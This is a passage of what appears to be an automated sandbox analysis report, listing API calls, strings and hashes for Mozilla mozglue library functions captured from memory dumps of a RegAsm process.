                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                            • API String ID: 2380290044-2272602182
                                                                            • Opcode ID: 457a1ab6eeece82258b6966f44ac4e4294e178f41e189859bed05e66ddc0cd48
                                                                            • Instruction ID: 1a0926d48a7e4d61aacb776ee7f06460a4d9f23debd1fc304d0061b72f735fca
                                                                            • Opcode Fuzzy Hash: 457a1ab6eeece82258b6966f44ac4e4294e178f41e189859bed05e66ddc0cd48
                                                                            • Instruction Fuzzy Hash: 7491E771B002148FDB04CFA9E8D475A77B2FF85714B285668E41AABB81F771E802CBD5
                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC48007
                                                                            • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC4801D
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC4802B
                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC4803D
                                                                            • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC4808D
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC4809B
                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC480B9
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC480DF
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480ED
                                                                            • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480FB
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4810D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC48133
                                                                            • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC48149
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC48167
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC4817C
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC48199
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                            • String ID:
                                                                            • API String ID: 2721933968-0
                                                                            • Opcode ID: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                            • Instruction ID: 4cd7d63cff29f2e1093a616d45f45fd7a678a30df627b810b33d07ad6d71f922
                                                                            • Opcode Fuzzy Hash: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                            • Instruction Fuzzy Hash: 895183B2E002149BDB00DBA9DC84AEFB7B9AF49364F148126E815E7741F735A905CBA1
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6CC41213
                                                                            • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC41285
                                                                            • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6CC412B9
                                                                            • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6CC41327
                                                                            Strings
                                                                            • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6CC4131B
                                                                            • &, xrefs: 6CC4126B
                                                                            • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6CC412AD
                                                                            • MZx, xrefs: 6CC411E1
                                                                            • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6CC4120D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$toupper
                                                                            • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                            • API String ID: 403083179-3658087426
                                                                            • Opcode ID: 3e16fd5c83407ce78f9cf1b38fa99cadf590d9b6a752389335596af92aa2c3e2
                                                                            • Instruction ID: 1afe90019d4850eedea6f23d10d6e6cb27e7957bd05694e60a6a7139557b1260
                                                                            • Opcode Fuzzy Hash: 3e16fd5c83407ce78f9cf1b38fa99cadf590d9b6a752389335596af92aa2c3e2
                                                                            • Instruction Fuzzy Hash: 8D71D671E013548ADB109FB8C8447DEB7F5BF44309F04865ED585A3B40FB34AAA9CBA2
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                            • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                            • FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                            • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • __aulldiv.LIBCMT ref: 6CC3346B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                            • String ID: KernelBase.dll$QueryInterruptTime
                                                                            • API String ID: 3006643210-2417823192
                                                                            • Opcode ID: 24d0bffebbf9098df0dd450c23b91b6a6a62f61fec522b2f71c3558530eb498e
                                                                            • Instruction ID: 1c94c05127b750f9548ece4308760e28e0583b76498d4b895636a058bacb5580
                                                                            • Opcode Fuzzy Hash: 24d0bffebbf9098df0dd450c23b91b6a6a62f61fec522b2f71c3558530eb498e
                                                                            • Instruction Fuzzy Hash: 4D611F71A087418BCB11CF78C45065AB7F4BFC6354F248B1DF8A9A3A91EB30A54A8B46
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96694
                                                                            • GetThreadId.KERNEL32(?), ref: 6CC966B1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC966B9
                                                                            • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC966E1
                                                                            • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96734
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC9673A
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF618), ref: 6CC9676C
                                                                            • GetCurrentThread.KERNEL32 ref: 6CC967FC
                                                                            • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC96868
                                                                            • RtlCaptureContext.NTDLL ref: 6CC9687F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                            • String ID: WalkStack64
                                                                            • API String ID: 2357170935-3499369396
                                                                            • Opcode ID: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                            • Instruction ID: af78d29077be33a60a17b64599f805b13a55f32f750c1917ff7349afd26404fb
                                                                            • Opcode Fuzzy Hash: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                            • Instruction Fuzzy Hash: BC51DB71A09701AFDB51CFA4C884B5ABBF4BF89714F00492DF89887690E770E908CB96
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DF7D
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DF8A
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DFC9
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DFF7
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E000
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                            • free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                            • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                            Strings
                                                                            • <none>, xrefs: 6CC7DFD7
                                                                            • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC7E00E
                                                                            • [I %d/%d] locked_profiler_stop, xrefs: 6CC7DE83
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                            • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                            • API String ID: 1281939033-809102171
                                                                            • Opcode ID: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                            • Instruction ID: bbb3ebcb5fecd236de531b9bf4561cf1e43243eb28dd6efe89c0c29d5eca5e3e
                                                                            • Opcode Fuzzy Hash: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                            • Instruction Fuzzy Hash: DA41D13DB012119FDB209FA9D8587AAB775EB8630CF144019E90997F01EB71AC05CBFA
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D85F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D86C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D918
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D93C
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D948
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D970
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D976
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D982
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D9CF
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8DA2E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8DA6F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8DA78
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6CC8DA91
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8DAB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                            • String ID:
                                                                            • API String ID: 1195625958-0
                                                                            • Opcode ID: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                            • Instruction ID: e46abd5caba052722e54fcc871b490c89618e6130c17c4d8554c6d930661f241
                                                                            • Opcode Fuzzy Hash: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                            • Instruction Fuzzy Hash: 5371CC716043059FCB00CF69C898B9ABBF5FF89318F15856EF85A9B311EB30A945CB91
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D4F0
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D4FC
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D52A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D530
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D53F
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D55F
                                                                            • free.MOZGLUE(00000000), ref: 6CC8D585
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8D5D3
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D5F9
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D605
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D652
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D658
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D667
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D6A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                            • String ID:
                                                                            • API String ID: 2206442479-0
                                                                            • Opcode ID: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                            • Instruction ID: 6b8429217441f5d062c37c545a1846f654b366f4165faeed9df6732add8e392b
                                                                            • Opcode Fuzzy Hash: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                            • Instruction Fuzzy Hash: D3516AB16057059FC704DF75C898A9ABBB4FF89318F108A2EE84A87711EB30A945CB95
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC556D1
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC556E9
                                                                            • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC556F1
                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC55744
                                                                            • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC557BC
                                                                            • GetTickCount64.KERNEL32 ref: 6CC558CB
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC558F3
                                                                            • __aulldiv.LIBCMT ref: 6CC55945
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC559B2
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCBF638,?,?,?,?), ref: 6CC559E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                            • String ID: MOZ_APP_RESTART
                                                                            • API String ID: 2752551254-2657566371
                                                                            • Opcode ID: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                            • Instruction ID: 12408110a06ff88b6264ba13c981f0291965a2d368dcbb3d891aac047f195198
                                                                            • Opcode Fuzzy Hash: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                            • Instruction Fuzzy Hash: 6DC19B79A083419FCB05CF68C44066ABBF1BFDA714F458A1DE8C497760E730E895CB86
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EC84
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EC8C
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7ECA1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ECAE
                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC7ECC5
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED0A
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7ED19
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7ED28
                                                                            • free.MOZGLUE(00000000), ref: 6CC7ED2F
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED59
                                                                            Strings
                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CC7EC94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                            • API String ID: 4057186437-125001283
                                                                            • Opcode ID: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                            • Instruction ID: 07281a793eb7ed1c1053609bf6e718834aecc0d9380b5e9f9dcdcdc33db649e5
                                                                            • Opcode Fuzzy Hash: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                            • Instruction Fuzzy Hash: 3C21F17E600118AFDB109FA8D848ADAB779FF4626CF104214FC1897B41FB719C158BB9
                                                                            APIs
                                                                            • AcquireSRWLockShared.KERNEL32 ref: 6CC43BB4
                                                                            • ReleaseSRWLockShared.KERNEL32 ref: 6CC43BD2
                                                                            • AcquireSRWLockExclusive.KERNEL32 ref: 6CC43BE5
                                                                            • ReleaseSRWLockExclusive.KERNEL32 ref: 6CC43C91
                                                                            • ReleaseSRWLockShared.KERNEL32 ref: 6CC43CBD
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC43CF1
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1881024734-0
                                                                            • Opcode ID: e7b4137685bf5dc6ab23edceeca029da9df828a227552669e7664d9a9994d071
                                                                            • Instruction ID: e352c688748c690a1130ce2487ad8135125a0361c86616790666ffc7e0f94dae
                                                                            • Opcode Fuzzy Hash: e7b4137685bf5dc6ab23edceeca029da9df828a227552669e7664d9a9994d071
                                                                            • Instruction Fuzzy Hash: EAC16CB5A097418FC714DF29C08465ABBF1BF89304F19CA5ED8998BB11E731E885CB82
                                                                            APIs
